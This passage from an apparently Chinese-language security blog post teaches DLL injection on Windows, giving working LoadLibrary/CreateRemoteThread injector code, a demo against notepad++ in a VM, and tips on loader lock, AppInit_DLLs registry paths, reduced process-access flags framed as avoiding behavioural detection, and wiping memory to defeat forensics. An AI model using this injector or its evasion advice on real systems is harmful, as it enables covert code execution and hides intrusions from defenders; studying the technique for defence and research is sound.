	LPVOID pDllPath <span class="token operator">=</span> <span class="token function">VirtualAllocEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token function">wcslen</span><span class="token punctuation">(</span>dllPath<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token punctuation">)</span><span class="token punctuation">,</span> MEM_COMMIT<span class="token punctuation">,</span> PAGE_READWRITE<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>pDllPath <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	SIZE_T bytesWritten<span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">WriteProcessMemory</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> dllPath<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token function">wcslen</span><span class="token punctuation">(</span>dllPath<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>bytesWritten<span class="token punctuation">)</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	HMODULE hKernel32 <span class="token operator">=</span> <span class="token function">GetModuleHandleW</span><span class="token punctuation">(</span>L<span class="token string">"Kernel32.dll"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>hKernel32 <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	LPTHREAD_START_ROUTINE pLoadLibraryW <span class="token operator">=</span> <span class="token generic-function"><span class="token function">reinterpret_cast</span><span class="token generic class-name"><span class="token operator">&lt;</span>LPTHREAD_START_ROUTINE<span class="token operator">></span></span></span><span class="token punctuation">(</span><span class="token function">GetProcAddress</span><span class="token punctuation">(</span>hKernel32<span class="token punctuation">,</span> <span class="token string">"LoadLibraryW"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>pLoadLibraryW <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	HANDLE hThread <span class="token operator">=</span> <span class="token function">CreateRemoteThread</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> pLoadLibraryW<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>hThread <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token function">WaitForSingleObject</span><span class="token punctuation">(</span>hThread<span class="token punctuation">,</span> INFINITE<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hThread<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">// 呼叫函數</span>
<span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> CALLBACK <span class="token function">StartInjection</span><span class="token punctuation">(</span>HWND hwnd<span class="token punctuation">,</span> HINSTANCE hinst<span class="token punctuation">,</span> LPSTR lpszCmdLine<span class="token punctuation">,</span> <span class="token keyword">int</span> nCmdShow<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
	<span class="token keyword">int</span> targetPID <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>lpszCmdLine <span class="token operator">&amp;&amp;</span> <span class="token operator">*</span>lpszCmdLine<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		targetPID <span class="token operator">=</span> std<span class="token double-colon punctuation">::</span><span class="token function">atoi</span><span class="token punctuation">(</span>lpszCmdLine<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token keyword">wchar_t</span> dllPath<span class="token punctuation">[</span>MAX_PATH<span class="token punctuation">]</span><span class="token punctuation">;</span>

	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">getDLLPath</span><span class="token punctuation">(</span>dllPath<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token string">"GetDLLPath Fail"</span><span class="token punctuation">,</span> <span class="token string">"LoadLibraryInject"</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">exit</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token keyword">if</span> <span class="token punctuation">(</span>targetPID <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token string">"rundll32.exe &lt;DLLFILE>,StartInjection &lt;PID>"</span><span class="token punctuation">,</span> <span class="token string">"LoadLibraryInject"</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">exit</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token function">DLLinject</span><span class="token punctuation">(</span>targetPID<span class="token punctuation">,</span> dllPath<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token function">ExitProcess</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

BOOL APIENTRY <span class="token function">DllMain</span><span class="token punctuation">(</span>HMODULE hModule<span class="token punctuation">,</span> DWORD  ul_reason_for_call<span class="token punctuation">,</span> LPVOID lpReserved<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
	HANDLE hProcess <span class="token operator">=</span> <span class="token function">GetCurrentProcess</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">wchar_t</span> processName<span class="token punctuation">[</span>MAX_PATH<span class="token punctuation">]</span> <span class="token operator">=</span> L<span class="token string">"&lt;unknown>"</span><span class="token punctuation">;</span>

	<span class="token keyword">switch</span> <span class="token punctuation">(</span>ul_reason_for_call<span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
	<span class="token keyword">case</span> DLL_PROCESS_ATTACH<span class="token operator">:</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleBaseNameW</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> processName<span class="token punctuation">,</span> MAX_PATH<span class="token punctuation">)</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
			std<span class="token double-colon punctuation">::</span>wstring msg <span class="token operator">=</span> L<span class="token string">"DLL is run at :\n"</span><span class="token punctuation">;</span>
			msg <span class="token operator">+=</span> processName<span class="token punctuation">;</span>
			<span class="token function">MessageBoxW</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> msg<span class="token punctuation">.</span><span class="token function">c_str</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> L<span class="token string">"LoadLibraryInject"</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
		<span class="token keyword">break</span><span class="token punctuation">;</span>
	<span class="token keyword">case</span> DLL_THREAD_ATTACH<span class="token operator">:</span>
	<span class="token keyword">case</span> DLL_THREAD_DETACH<span class="token operator">:</span>
	<span class="token keyword">case</span> DLL_PROCESS_DETACH<span class="token operator">:</span>
		<span class="token keyword">break</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> TRUE<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>

<p>編譯完成之後，將 dll 放入虛擬機中。然後找一個用來注入的目標，這邊選擇了 <code>notepad++.exe</code> 來作為對象，使用 <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite">Sysinternals Suite</a> 的<code>process explorer</code>  來檢視該行程的 PID 與目前引入的 DLL 清單 :<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611195208.png"></p>
<p>看見目標PID是1452，執行命令 :</p>
<pre class="language-cmd" data-language="cmd"><code class="language-cmd">rundll32 LoadLibraryInject.dll, StartInjection 1452</code></pre>

<p>首先你會看到視窗顯示的名稱是 <code>rundll32.exe</code> 代表成功在 rundll32 上運行。接下來 <code>notepad++.exe</code> 會彈出視窗，代表我們成功進行 DLL注入了 !</p>
<blockquote class="note warning"><p>進行注入極可能導致目標程式沒有回應，尤其是 DllMain 中使用 MessageBox 導致的 Loader Lock。<br>故盡量不要與被注入的程式互動 ( 注意事項章節將說明解決方案 )</p>
</blockquote>

<p>成功注入後，使用 <code>process explorer</code> 中可以看到現在 <code>notepad++.exe</code> 已經引入 <code>LoadLibraryInject.dll</code>。</p>
<p><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611200142.png"></p>
<h2 id="DLL注入注意事項"><a href="#DLL注入注意事項" class="headerlink" title="DLL注入注意事項"></a>DLL注入注意事項</h2><p>如果剛剛在注入後對 Notepad++ 進行操作，就會發現程式<strong>無回應</strong>並且重新啟動了。因此在進行DLL注入時，需要特別注意架構兼容性、DllMain函數限制、行程權限管理、記憶體分配策略以及安全檢測規避等多個問題，以確保注入過程的穩定性和成功率。並且這些問題<strong>不僅限於 LoadLibrary 注入手法</strong>，以下會說明常見的一些情況。</p>
<h3 id="DllMain函數的限制"><a href="#DllMain函數的限制" class="headerlink" title="DllMain函數的限制"></a>DllMain函數的限制</h3><p>由於DLL被加載到進程後會自動運行 <code>DllMain()</code> 函數，因此我們會想把很多想執行的代碼放到 <code>DllMain()</code> 函數中。然而，Windows 透過一把 Loader Lock 來保護模組載入&#x2F;解除載入期間的內部結構（PE 映像、導入表、TLS 等等）。任何在 Loader Lock 持有期間又嘗試載入其他 DLL、開新執行緒、等候物件、做 COM 初始化……都可能導致死結發生而崩潰。就像剛剛 Notepad++ 崩潰就是因為使用了 MessageBox 導致死鎖。</p>
<p>常見的情況像是這樣 :</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp">HANDLE hThread <span class="token operator">=</span> <span class="token function">CreateThread</span><span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">,</span> WorkerProc<span class="token punctuation">,</span> <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token function">WaitForSingleObject</span><span class="token punctuation">(</span>hThread<span class="token punctuation">,</span> INFINITE<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 立即觸發死鎖CloseHandle(hThread);</span>
<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hThread<span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>

<p>而微軟有詳細說明你不該在 <code>DllMain()</code> 做的事 :<br><a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-tw/windows/win32/dlls/dynamic-link-library-best-practices">https://learn.microsoft.com/zh-tw/windows/win32/dlls/dynamic-link-library-best-practices</a></p>
<hr>
<p>那我們該甚麼做呢? 其實只要在 <code>DllMain()</code> 中避免使用會導致<strong>模組加載</strong>或<strong>資源爭用</strong> 的函數就可以了。</p>
<blockquote>
<p>啊我就是需要這些功能阿<br>							— 作者 </p>
</blockquote>
<p>當然不能能說不用就不用，正確的方式是將 <code>DllMain()</code> 設計為<strong>非阻塞式</strong>，而會造成阻塞的功能則透過 <strong>thread-pool</strong> 避開 Loader-Lock。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">static</span> <span class="token keyword">void</span> CALLBACK <span class="token function">ShowHostProcess</span><span class="token punctuation">(</span>PTP_CALLBACK_INSTANCE<span class="token punctuation">,</span> PVOID<span class="token punctuation">,</span> PTP_WORK<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token keyword">wchar_t</span> name<span class="token punctuation">[</span>MAX_PATH<span class="token punctuation">]</span> <span class="token operator">=</span> L<span class="token string">"&lt;unknown>"</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleBaseNameW</span><span class="token punctuation">(</span><span class="token function">GetCurrentProcess</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token keyword">nullptr</span><span class="token punctuation">,</span> name<span class="token punctuation">,</span> MAX_PATH<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		std<span class="token double-colon punctuation">::</span>wstring msg <span class="token operator">=</span> L<span class="token string">"DLL is run at :\n"</span><span class="token punctuation">;</span>
		msg <span class="token operator">+=</span> name<span class="token punctuation">;</span>
		<span class="token function">MessageBoxW</span><span class="token punctuation">(</span><span class="token keyword">nullptr</span><span class="token punctuation">,</span> msg<span class="token punctuation">.</span><span class="token function">c_str</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> L<span class="token string">"SafeLoadLibraryInject"</span><span class="token punctuation">,</span> MB_OK<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

BOOL APIENTRY <span class="token function">DllMain</span><span class="token punctuation">(</span>HMODULE hModule<span class="token punctuation">,</span> DWORD  ul_reason_for_call<span class="token punctuation">,</span> LPVOID lpReserved<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
	<span class="token keyword">switch</span> <span class="token punctuation">(</span>ul_reason_for_call<span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token keyword">case</span> DLL_PROCESS_ATTACH<span class="token operator">:</span>

		<span class="token function">DisableThreadLibraryCalls</span><span class="token punctuation">(</span>hModule<span class="token punctuation">)</span><span class="token punctuation">;</span>  <span class="token comment">// 避免多餘回調</span>
		<span class="token comment">// 把 UI 相關動作排到 Loader-Lock 之外</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span>PTP_WORK w <span class="token operator">=</span> <span class="token function">CreateThreadpoolWork</span><span class="token punctuation">(</span>ShowHostProcess<span class="token punctuation">,</span> <span class="token keyword">nullptr</span><span class="token punctuation">,</span> <span class="token keyword">nullptr</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token function">SubmitThreadpoolWork</span><span class="token punctuation">(</span>w<span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> TRUE<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>

<p>這時候再次對 <code>notepad++.exe</code> 進行注入，就可以使訊息窗與者程式同時順暢運行。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250612011511.png"></p>
<h3 id="32與64位元兼容性問題"><a href="#32與64位元兼容性問題" class="headerlink" title="32與64位元兼容性問題"></a>32與64位元兼容性問題</h3><p>在進行DLL注入時，最關鍵的限制之一是架構兼容性問題。由於Windows系統的記憶體地址空間管理機制，不同架構的行程無法共享相同的記憶體空間結構。因此 <strong>32位不能注入64位</strong>、<strong>64位也不能注入32位</strong>，需確保注入器與目標行程的架構完全一致。</p>
<p>相同的，若是利用到註冊表來進行注入的方式，也需要注意到兼容性問題。比如 <code>App_Init_DLLs</code> 有兩個不同的註冊表路徑 :</p>
<ul>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</li>
</ul>
<p>因此，在設計注入工具時，應該首先檢測目標進程的架構類型，然後選擇相應的DLL版本進行注入與設定。</p>
<h3 id="權限與記憶體管理"><a href="#權限與記憶體管理" class="headerlink" title="權限與記憶體管理"></a>權限與記憶體管理</h3><p>針對目標注入時，通常需要獲得足夠的訪問權限。比如說若我們需要 LoadLibrary 注入，則通過<code>OpenProcess</code> 函數獲取目標行程句柄時，通常使用<code>PROCESS_ALL_ACCESS</code>權限標誌，不過這樣會大幅提高被行為式偵測標記的機率(畢竟惡意程式最愛偷懶這樣寫）。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp">HANDLE hProcess <span class="token operator">=</span> <span class="token function">OpenProcess</span><span class="token punctuation">(</span>PROCESS_ALL_ACCESS<span class="token punctuation">,</span> FALSE<span class="token punctuation">,</span> pid<span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>

<p>因為 <code>LoadLibraryW</code> + <code>CreateRemoteThread</code> 實際上僅使用了以下4個 FLAG，依最小權限組合我們可以僅使用這些旗標即可。</p>
<table>
<thead>
<tr>
<th>權限旗標</th>
<th>十六進位值</th>
<th>為什麼需要</th>
</tr>
</thead>
<tbody><tr>
<td><code>PROCESS_CREATE_THREAD</code></td>
<td><code>0x0002</code></td>
<td>在目標行程內開一條 Remote Thread 來呼叫 <code>LoadLibraryW</code>。</td>
</tr>
<tr>
<td><code>PROCESS_VM_OPERATION</code></td>
<td><code>0x0008</code></td>
<td>在目標行程配置或解除記憶體（<code>VirtualAllocEx</code> &#x2F; <code>VirtualFreeEx</code>）。</td>
</tr>
<tr>
<td><code>PROCESS_VM_WRITE</code></td>
<td><code>0x0020</code></td>
<td>把字串「DLL 路徑」寫進剛配置好的記憶體區段。</td>
</tr>
<tr>
<td><code>PROCESS_QUERY_LIMITED_INFORMATION</code></td>
<td><code>0x1000</code></td>
<td>取得行程基本資訊，用來確認位元數 (x86&#x2F;x64)、Integrity Level 等；必要時也可配合 <code>GetModuleHandleEx</code> 找 <code>kernel32.dll</code> 基址。</td>
</tr>
</tbody></table>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp">HANDLE hProcess <span class="token operator">=</span> <span class="token function">OpenProcess</span><span class="token punctuation">(</span>PROCESS_CREATE_THREAD <span class="token operator">|</span> PROCESS_VM_OPERATION <span class="token operator">|</span> PROCESS_VM_WRITE<span class="token operator">|</span> PROCESS_QUERY_LIMITED_INFORMATION<span class="token punctuation">,</span> FALSE<span class="token punctuation">,</span> pid<span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>這時我們在對 notepad.exe 進行注入，也是可以成功的注入。並且可以避免 Protected Process Light (PPL) 或一些核心服務因為超出需求範圍的權限請求視為「過度操作」而回傳 <code>ERROR_ACCESS_DENIED</code>導致注入失敗。</p>
<h3 id="字元編碼與API選擇"><a href="#字元編碼與API選擇" class="headerlink" title="字元編碼與API選擇"></a>字元編碼與API選擇</h3><p>這一點我認為是挺常遇到的，當我們使用 Windows API 時會看到三種類型，以 MessageBox 舉例，會發現有三種函數可以呼叫:</p>
<ul>
<li>MessageBox</li>
<li>MessageBoxA</li>
<li>MessageBoxW</li>
</ul>
<p>大部分的人會直接使用 <code>MessageBox</code> 進行呼叫，不過觀察以下程式碼可以發現 <code>MessageBox</code> 是泛型巨集（macro），編譯時依定義 <strong>自動對應到 A (ANSI) 或  W (Unicode) 版本</strong>。<br>WinUser.h:9227</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">ifdef</span> <span class="token expression">UNICODE</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">MessageBox</span>  <span class="token expression">MessageBoxW</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">else</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">MessageBox</span>  <span class="token expression">MessageBoxA</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">endif</span> <span class="token comment">// !UNICODE</span></span></code></pre>

<p>那我們又該如何選擇要使用 W 還是 A 呢? 以我個人的建議 : <strong>一律選擇 W ，且別再用 ANSI 版本</strong>了。</p>
<p>這麼說似乎有點太果斷，不過任何以 <code>A</code> 結尾的 WINAPI 函式，例如 <code>ShellExecuteExA</code>、<code>CreateFileA</code> 等，它們都是先呼叫 <code>MultiByteToWideChar</code>（或其他變形）把 UTF-8 編碼轉成 UTF-16 編碼，然後再呼叫對應的寬字元版本。此外，若使用 ANSI 將會導致在非英語系相容性出問題，導致亂碼或截斷。 </p>
<h3 id="不優的優化"><a href="#不優的優化" class="headerlink" title="不優的優化"></a>不優的優化</h3><p>MSVC 編譯器有時會會根據你的程式內容來做一些優化，不過這些優化可能會導致你的實作失效。特別是關於記憶體操作的部分，以 myZeroMemory 為例，它的功用是將記憶體中殘留的資訊清空 :</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">for</span><span class="token punctuation">(</span>i<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span> i<span class="token operator">&lt;</span>sz<span class="token punctuation">;</span> <span class="token operator">++</span>i<span class="token punctuation">)</span> p<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span></code></pre>
<p>當 MSVC 編譯時，可能會<strong>自動被優化</strong>為 <code>memset(p,0,sz)</code>，而學過程式碼安全的可能會知道 : 當編譯器檢測到某個記憶體緩衝區在<strong>被清零後不再使用時</strong>，可能會將memset或ZeroMemory的呼叫視為 <strong>“死碼”</strong> 而<strong>移除</strong>。導致在記憶體鑑識時可以找到惡意程式留下的痕跡。</p>
<p>P.S. 建議使用 SecureZeroMemory 函數來抹除記憶體。(不是ZeroMemory，ZeroMemory &#x3D; memset)</p>
<h1 id="後記"><a href="#後記" class="headerlink" title="後記"></a>後記</h1><p>原本想把所有技術都放在同一篇文章裡面一起寫完，不過寫到摘要時發現內容量會太多，所以就分成好幾篇文章好了。</p>
<p>若文中有錯誤或需要討論的地方，歡迎聯絡 <code>admin@dinlon5566.com</code>。</p>
<hr>
<h1 id="參考資料"><a href="#參考資料" class="headerlink" title="參考資料"></a>參考資料</h1><ol>
<li><a target="_blank" rel="noopener" href="https://github.com/cocomelonc/mdmz_book">https://github.com/cocomelonc/mdmz_book</a></li>
<li><a target="_blank" rel="noopener" href="https://samples.vx-underground.org/Microblog/2024-07-03%20-%20Small%20tidbits%20of%20malware%20dev%20knowledge.html">https://samples.vx-underground.org/Microblog/2024-07-03%20-%20Small%20tidbits%20of%20malware%20dev%20knowledge.html</a></li>
<li><a target="_blank" rel="noopener" href="https://trustedsec.com/blog/burrowing-a-hollow-in-a-dll-to-hide">https://trustedsec.com/blog/burrowing-a-hollow-in-a-dll-to-hide</a></li>
<li><a target="_blank" rel="noopener" href="https://www.codereversing.com/archives/652">https://www.codereversing.com/archives/652</a></li>
</ol>
<hr>
<p>The right to search for truth implies also a duty; one must not conceal any part of what one has recognized to be true.<br>尋求真理的權利亦暗示著一份責任；  我們絕不應該隱藏任何已認定為真實的部分。<br>— Albert Einstein</p>

    </div>
  </div>

  
    
  <div class="sea-prev-next-wrapper">
    
      <div class="prev">
        <svg t="1725418977480" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4239" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M384 512L731.733333 202.666667c17.066667-14.933333 19.2-42.666667 4.266667-59.733334-14.933333-17.066667-42.666667-19.2-59.733333-4.266666l-384 341.333333c-10.666667 8.533333-14.933333 19.2-14.933334 32s4.266667 23.466667 14.933334 32l384 341.333333c8.533333 6.4 19.2 10.666667 27.733333 10.666667 12.8 0 23.466667-4.266667 32-14.933333 14.933333-17.066667 14.933333-44.8-4.266667-59.733334L384 512z" p-id="4240"></path></svg>
        <a class="link" href="/2025/09/15/IDA-MCP%E5%AE%89%E8%A3%9D%E8%88%87%E4%BD%BF%E7%94%A8%E6%95%99%E5%AD%B8/">
          IDA MCP安裝與使用教學
        </a>
      </div>
    
    
      <div class="next">
        <a class="link" href="/2025/06/05/%E6%88%91%E6%9C%89%E9%83%A8%E8%90%BD%E6%A0%BC%E4%BA%86OwO/">
          我有部落格了OwO
        </a>
        <svg t="1725418993065" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="6832" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M731.733333 480l-384-341.333333c-17.066667-14.933333-44.8-14.933333-59.733333 4.266666-14.933333 17.066667-14.933333 44.8 4.266667 59.733334L640 512 292.266667 821.333333c-17.066667 14.933333-19.2 42.666667-4.266667 59.733334 8.533333 8.533333 19.2 14.933333 32 14.933333 10.666667 0 19.2-4.266667 27.733333-10.666667l384-341.333333c8.533333-8.533333 14.933333-19.2 14.933334-32s-4.266667-23.466667-14.933334-32z" p-id="6833"></path></svg>
      </div>
    
  </div>

  
</article>



<script defer>
  document.addEventListener('DOMContentLoaded', function () {
    const toggleIcon = document.querySelector('.sea-article-catalog-title .sea-svg-icon');
    const tocContent = document.querySelector('.sea-article-catalog > .toc');
    if (toggleIcon && tocContent) {
      toggleIcon.addEventListener('click', function () {
        tocContent.classList.toggle('sea-article-catalog-show');
